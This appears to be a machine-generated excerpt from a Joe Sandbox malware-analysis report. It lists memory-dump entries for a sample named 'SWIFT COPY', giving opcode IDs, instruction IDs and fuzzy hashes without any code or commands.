                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d67ebd7c9dedbe7d0d434098f0c3ae7ed6c4d8df1dfb21b6228a10a400654f2d
                                                                                              • Instruction ID: f271fffdb93cd4d3735f5ea732acbddef49737ada0ca8addeefec991ad991ffb
                                                                                              • Opcode Fuzzy Hash: d67ebd7c9dedbe7d0d434098f0c3ae7ed6c4d8df1dfb21b6228a10a400654f2d
                                                                                              • Instruction Fuzzy Hash: 57319072E04219AFDB71DEADC840EAEFBF9EB44754F014436E916E7250D2709A008BA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ee8b9e6afba68ed0d3a49a2a820bad0809409c6f2c5b89307ac430678912ce93
                                                                                              • Instruction ID: 8abd94c038f3ca051f4a30a60f38db4fbe639308d34c03c897431afcc0ce9252
                                                                                              • Opcode Fuzzy Hash: ee8b9e6afba68ed0d3a49a2a820bad0809409c6f2c5b89307ac430678912ce93
                                                                                              • Instruction Fuzzy Hash: 4131B6B1B00616ABDB229F9DCC51B6BBBF9EF44758F14406DE605DB351DA30ED408790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d798ad649b41f7f049b572ae0aaddbca5c601007c65dee2b6bf68c994c9f9f0f
                                                                                              • Instruction ID: baa69432bc1cff853c29a7e616454f37d1fb973877de721ae90bfe4500ab0a71
                                                                                              • Opcode Fuzzy Hash: d798ad649b41f7f049b572ae0aaddbca5c601007c65dee2b6bf68c994c9f9f0f
                                                                                              • Instruction Fuzzy Hash: 3331D732A04716DBC716EE6C8880E6BBFA5EFD4658F014529FD559B310DA30DC0187E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 83c9ceebca70d897ca1702342c8f2424a16a6a955e1b8e6d10f5399ba1603fdf
                                                                                              • Instruction ID: 2ea4e82e981dc54dd97335a2a51b99937cb42f09c872213b00220d3308fb471f
                                                                                              • Opcode Fuzzy Hash: 83c9ceebca70d897ca1702342c8f2424a16a6a955e1b8e6d10f5399ba1603fdf
                                                                                              • Instruction Fuzzy Hash: 0D3198716097019FE721CF19C840B2BBBE5AB88708F044AADF98897391D374E804CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                              • Instruction ID: d0475cc7598cd04fe0939c51d60d550a2db1cdbcaf369fa2d7758b7a4b38291f
                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                              • Instruction Fuzzy Hash: E3312BB2B00B01AFD761CFADDD41B57BBFCBB08A54F08492DA59AD3651E634E900CB64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8254234faa7dc710af5bf0a07f9c94c7982f5d9c86550d0b9d720c2b4347c20d
                                                                                              • Instruction ID: 8d92c1ce38e0dcca60f4cf5f99d160b44091dfaeea69dd5d2167ed385ba3c21d
                                                                                              • Opcode Fuzzy Hash: 8254234faa7dc710af5bf0a07f9c94c7982f5d9c86550d0b9d720c2b4347c20d
                                                                                              • Instruction Fuzzy Hash: 16318BB2505311CFCB11DF19D54095ABFF1FF89618F4549AEF8889B251D330E985CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3534e13fe617a45e01cab75861c64045e63c3642a20bf3d716aeb6727fd7b354
                                                                                              • Instruction ID: fa995efb1ed83e1b07fda578b2046ebde2df3429dc085420d784e1d480ecc556
                                                                                              • Opcode Fuzzy Hash: 3534e13fe617a45e01cab75861c64045e63c3642a20bf3d716aeb6727fd7b354
                                                                                              • Instruction Fuzzy Hash: 42110C723001249BCF19DB29DC45A6BB66ADBD5778B258539DD22CB350EA309D41C790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c26152da43446b70af4acd0711edb7ca20ae9037033676e0d999ddbad6e735fc
                                                                                              • Instruction ID: 8a71e44fa091983b63900180835e5dd25a3a745b744eab6ef0385406bb614a23
                                                                                              • Opcode Fuzzy Hash: c26152da43446b70af4acd0711edb7ca20ae9037033676e0d999ddbad6e735fc
                                                                                              • Instruction Fuzzy Hash: 181123B2A00205DFCB25CF5DD481A1AFBFCEF94294F068079E905AB318E638DD00CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                              • Instruction ID: fd5b19d28f0f338af430abcadd0cd9c0f233757e8c564bb5ecf5bc476e46e935
                                                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                              • Instruction Fuzzy Hash: 3F11C436A00919AFDB19CB58CC05B9EFBF5EF84214F058269E95597340E671BD51CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                              • Instruction ID: 6c72e2f62cd6f418391eb13c75d3c23c11b10f6ad3b6c78f2bed338a60f8e94e
                                                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                              • Instruction Fuzzy Hash: 5F116A32600A05EFE7219A4DC880BD6BEE6EB45B58F058438EB19DB960EB71DC40DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b7e9002d3fe929a543f5aa2deef1757c11cba649c31a63d67b333b9c34e995fa
                                                                                              • Instruction ID: f53f934a6e2fb49f97f0dc1a73c90a8623d8e00a9292410bea93ad47d655a7fc
                                                                                              • Opcode Fuzzy Hash: b7e9002d3fe929a543f5aa2deef1757c11cba649c31a63d67b333b9c34e995fa
                                                                                              • Instruction Fuzzy Hash: 43012631605689ABE716A2AED894F277F9CEF8175CF090075FD008B650D924DC00C2A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2e3e5c7f526ca61968cd78e67ac3e0c07db882839fc75b83629d4b03ca65fa1d
                                                                                              • Instruction ID: a6f3d2bc218a42eb0e7eacfe5f746a0c3633bef5daf098b8bbf0f3fb93d5b49c
                                                                                              • Opcode Fuzzy Hash: 2e3e5c7f526ca61968cd78e67ac3e0c07db882839fc75b83629d4b03ca65fa1d
                                                                                              • Instruction Fuzzy Hash: 8411CE36200645AFDB36CF5ED840F567BA8EBD6B6CF04411AF9248B690C374E840CFA8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3521a62e96ce057f639c2f44d2cc1fb7eabf2b9ecccb547133c0940251985c2d
                                                                                              • Instruction ID: a5a08af3d9a71e87565083b407ad69cd153dabf008206155bc1c1dc5c8663dd2
                                                                                              • Opcode Fuzzy Hash: 3521a62e96ce057f639c2f44d2cc1fb7eabf2b9ecccb547133c0940251985c2d
                                                                                              • Instruction Fuzzy Hash: 19117336200A119BD7229A6AD844F67B7B5FFC5611F19452AEB86877A0DA30A802C790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: daf5e4c53106b9ca0d6d5b2791494d888ade6c85d95e107f0c1daa8a84500db6
                                                                                              • Instruction ID: 206c399068b2de8ec36214973ad8f543bef94db4b2a0dc590d81d1fb3fc9cd5a
                                                                                              • Opcode Fuzzy Hash: daf5e4c53106b9ca0d6d5b2791494d888ade6c85d95e107f0c1daa8a84500db6
                                                                                              • Instruction Fuzzy Hash: 9E11C2B2A00616ABDB21EF5DD981B5EFBBCEF847A4F504059DA01A7204D770AD018B94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e016c0c7fee3178471974a362bbd28b29c9b00f09b0a966787ae3dd459d4e8b7
                                                                                              • Instruction ID: f8a6bb38315d295763dcbf1763a38d476c1af1866312c87309daf39eb549da42
                                                                                              • Opcode Fuzzy Hash: e016c0c7fee3178471974a362bbd28b29c9b00f09b0a966787ae3dd459d4e8b7
                                                                                              • Instruction Fuzzy Hash: 3901DE715101099FD725DF29E404F66BBF9EB81B18F60817AE4048F271D770ED82CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                              • Instruction ID: be90d4a8564375ea0be36f9d2c95f4b6a92860bb8007b47dcbd7582dec650f8a
                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                              • Instruction Fuzzy Hash: 8211E5722056C6DBEB23972CC944F257FDCAB01B4CF1904B0DE41C7A42F328D942C650
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                              • Instruction ID: f44ccc1680c176b06c4494389c67c1ee7be63765a46a7636d5de3301cb640833
                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                              • Instruction Fuzzy Hash: 3201D232600115AFE7219F5CC882FDA7BA9EB80758F058034EB059BA60F775DD40D790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                              • Instruction ID: 07f4fff8d68a1e7c3169ca1d3751de65761574daf386861e4cf299a5c4b53fc3
                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                              • Instruction Fuzzy Hash: 780149314047369BCB319F19D840A727BF9FF56764700892DFC958BA81C332D400CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2bad57eff53a677304c8aa9848bc9ab5597a98d39902a7ebe534ffe25fab7562
                                                                                              • Instruction ID: 96c14a29a912a0e0deebdc28185410928c5a3184608a0397c75256fe103c0693
                                                                                              • Opcode Fuzzy Hash: 2bad57eff53a677304c8aa9848bc9ab5597a98d39902a7ebe534ffe25fab7562
                                                                                              • Instruction Fuzzy Hash: 6701C472541511ABC733DF2E9840E13BBA8EB91774B1A4276EA689B2F6D630E801C7D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0564490ad64261439b34a4b61b10a29f8afd004af96ed15c3534a4b97c0ae92e
                                                                                              • Instruction ID: 270ef6b12dfa397f22c9061f01cdb317d417aaf1f973df31ade591774db3b3db
                                                                                              • Opcode Fuzzy Hash: 0564490ad64261439b34a4b61b10a29f8afd004af96ed15c3534a4b97c0ae92e
                                                                                              • Instruction Fuzzy Hash: 3C11AD32241241EFDB26EF19CD80F16BBB8FF98B58F200075ED059B6A1C235ED01CA90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2eb7b2e971b6eb3f37c68a07d0943e07c8d0c6a883fcfce0cc7d9f2a3f95ba07
                                                                                              • Instruction ID: 5b8b37eb7b61749edef526758464ba4dbc5dbf5897fd734e49cc1d9f25d51daf
                                                                                              • Opcode Fuzzy Hash: 2eb7b2e971b6eb3f37c68a07d0943e07c8d0c6a883fcfce0cc7d9f2a3f95ba07
                                                                                              • Instruction Fuzzy Hash: BB115A70541229ABDF35AB68CC42FE9B2B8FF44718F504194A318A60E0DB709E81CF88
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d0c72167e0d32ed46b9458bc16461cb80797b06abd6f46dc2756aa2c366691d7
                                                                                              • Instruction ID: 073b93308f72835cdc1aca99e43a398637531b959afdb54dacb879cf48fab1be
                                                                                              • Opcode Fuzzy Hash: d0c72167e0d32ed46b9458bc16461cb80797b06abd6f46dc2756aa2c366691d7
                                                                                              • Instruction Fuzzy Hash: 7F112DB390001DABCB21DB99CC85DDF777CEF48258F044166E506E7211EA34EA55CBE0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                              • Instruction ID: 74ef060f71582809a9c3fb8709b05e4c66757ddafc20f5a4a936fd83a5bb4489
                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                              • Instruction Fuzzy Hash: FE01F4322046899BE322971DC805F59BBDCEF4175CF0880A5FA849BAA1D678D801C210
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f5a688584eeb6b6bcf9edaec597c2f28eabd2d77f11f81be4094c1a782f120c2
                                                                                              • Instruction ID: 73ce258eaf389582f7e8b8e50baa09b0bf9ed440bceae078d6cb84c9843ce464
                                                                                              • Opcode Fuzzy Hash: f5a688584eeb6b6bcf9edaec597c2f28eabd2d77f11f81be4094c1a782f120c2
                                                                                              • Instruction Fuzzy Hash: 80018F71A00259EBDB10EFADD841AEEBBF8FF58314F14006AE901A7390D774EA01CB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                              • Instruction ID: 9526ff9b524c701247099bdd6778be299013a99d51b80ac0c2d4b3a0b7c35242
                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                              • Instruction Fuzzy Hash: F3F01DB220001DBFEF019F99DD81DEF7BBEEB59698B104125FA11A2160D635DD21ABA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fa2936a2322ba9270f0a689df468798887c190fa223431940693706f4aeb331d
                                                                                              • Instruction ID: 5f856011f23ada78868d53b0da87e723f4e59ea6a8f2c34548b26e589b57c786
                                                                                              • Opcode Fuzzy Hash: fa2936a2322ba9270f0a689df468798887c190fa223431940693706f4aeb331d
                                                                                              • Instruction Fuzzy Hash: 4F018936500619EBCF229E84D840EDA7F66FB4C758F058101FE1866620C736D970EB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7355b6968bc3accf7b9180d1f39aa7d20ed743af19167d435d70de5a9342f577
                                                                                              • Instruction ID: dc50f30b161a13659174f51448c0268099096f70fe668825af38e000afd35ae4
                                                                                              • Opcode Fuzzy Hash: 7355b6968bc3accf7b9180d1f39aa7d20ed743af19167d435d70de5a9342f577
                                                                                              • Instruction Fuzzy Hash: 70F024712042619BF311B61D9C13B66329AEBC065CF35902AEB098B6C1E971FC01C394
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d60e8469937a3839371657e130517932c7b8d10eebec74cc23749972a552f762
                                                                                              • Instruction ID: 6aa0c393feda5f7e2de1bf176537b9bd9f004871d528a4c1fd5c489e5e0cbb7a
                                                                                              • Opcode Fuzzy Hash: d60e8469937a3839371657e130517932c7b8d10eebec74cc23749972a552f762
                                                                                              • Instruction Fuzzy Hash: D00149B0204685DFE3329B6CCD4AB6537ECFB41B4CF8C8154FB419B9D6E768D4418610
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                              • Instruction ID: b6cb93d54e75a6e31ccbc8f3a7d7dd0ba995e0fc8783b4613e5a3f8cfb88caf6
                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                              • Instruction Fuzzy Hash: 32F02E33341E1347E776AA2DB410B2FB695AF90D08B05852CA505CBE80DF30DC20C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                              • Instruction ID: a423658f5187809669b1ba2d9dd3a328047db8d2a2276a7fd2059cd06a59f753
                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                              • Instruction Fuzzy Hash: 93F05E32711A229BE7219A4EDCC0F96BBA8EFD5E64F190075A704DBA60D760EC0187D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5a6f40de4c6a4d185d7021dd847fe5dc7cdfb1106d1080ee7292300b80b575b7
                                                                                              • Instruction ID: f41ffad7595b626edf5114ec50de2cfebbe6248445ae42c8b1ca9003752d25ad
                                                                                              • Opcode Fuzzy Hash: 5a6f40de4c6a4d185d7021dd847fe5dc7cdfb1106d1080ee7292300b80b575b7
                                                                                              • Instruction Fuzzy Hash: 4DF0AF706093099FC720EF28C841A1ABBE4FF98714F40465AB998DB390E634E901C796
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                              • Instruction ID: 570b755b6f942b1977c15f676ca22e3ba795a9a240d0485bf1490c119e0154d7
                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                              • Instruction Fuzzy Hash: 16F0B472610204AFE728DB29CC01F96BBEDEF98348F14C078A545E7164FAB0ED41C654
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aaee1204e9218be8dd7ab06d7e08cedf8cd17929e25ad8bc7564c87a99100015
                                                                                              • Instruction ID: 00917f66fc9eba3871823f4aefd7d9d001155d956d1a28138b4b55a2bcc65f3d
                                                                                              • Opcode Fuzzy Hash: aaee1204e9218be8dd7ab06d7e08cedf8cd17929e25ad8bc7564c87a99100015
                                                                                              • Instruction Fuzzy Hash: EBF06270A0124DEFDB14EF69C555A9EB7F4FF18304F00805AB955EB395EA38EA01CB51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
